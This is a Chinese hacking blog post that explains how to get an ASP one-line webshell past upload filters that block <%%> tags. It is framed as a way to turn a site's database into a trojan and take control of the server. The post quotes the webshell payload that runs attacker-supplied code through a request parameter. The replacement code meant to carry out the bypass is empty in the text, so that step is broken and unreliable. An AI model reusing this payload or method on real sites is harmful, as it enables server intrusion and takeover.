我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 网络攻防一句话突破<%%>限制
一句话突破<%%>限制
3731
1推荐
0评论

多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。

使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。


不过在上传代码过程中,许多网页程序都不允许包含<%%>标记符号的内容的文件上传。


这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。


首先:原程序代码是"<%execute request("密码")%>", 我们可以把它的标签换下来。

然后改成""


这样就避开了使用<%%>,保存为.ASP,程序照样执行,效果是一样的

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415